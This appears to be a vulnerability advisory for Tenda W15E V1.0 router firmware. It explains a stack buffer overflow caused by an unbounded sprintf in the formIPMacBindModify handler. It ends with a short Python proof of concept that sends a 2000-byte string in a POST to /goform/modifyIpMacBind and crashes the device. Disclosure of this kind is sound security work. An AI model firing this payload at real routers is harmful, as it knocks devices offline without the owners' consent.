- Firmware download website: https://www.tendacn.com/download/detail-2722.html
W15EV1.0 V15.11.0.14
The Tenda W15EV1.0 V15.11.0.14 firmware has a stack overflow vulnerability in the formIPMacBindModify
function. The ruleIndex, ip, mac, remark
variable receives the IPMacBindRuleId, IPMacBindRuleIp, IPMacBindRuleMac, IPMacBindRuleRemark
parameter from a POST request. However, since the user can control the input of IPMacBindRuleId, IPMacBindRuleIp, IPMacBindRuleMac, IPMacBindRuleRemark
, the statement
sprintf(
(char *)tmp,
"%s;1;%s;%s;name%d;%s",
(const char *)ruleId,
(const char *)ip,
(const char *)mac,
v6,
(const char *)remark);
can cause a buffer overflow. The user-provided IPMacBindRuleId, IPMacBindRuleIp, IPMacBindRuleMac, IPMacBindRuleRemark
can exceed the capacity of the tmp
array, triggering this security vulnerability.
import requests
from pwn import*
ip = "192.168.84.101"
url = "http://" + ip + "/goform/modifyIpMacBind"
payload = b"a"*2000
data = {
'IPMacBindRuleIp':payload,
}
response = requests.post(url, data=data)
print(response.text)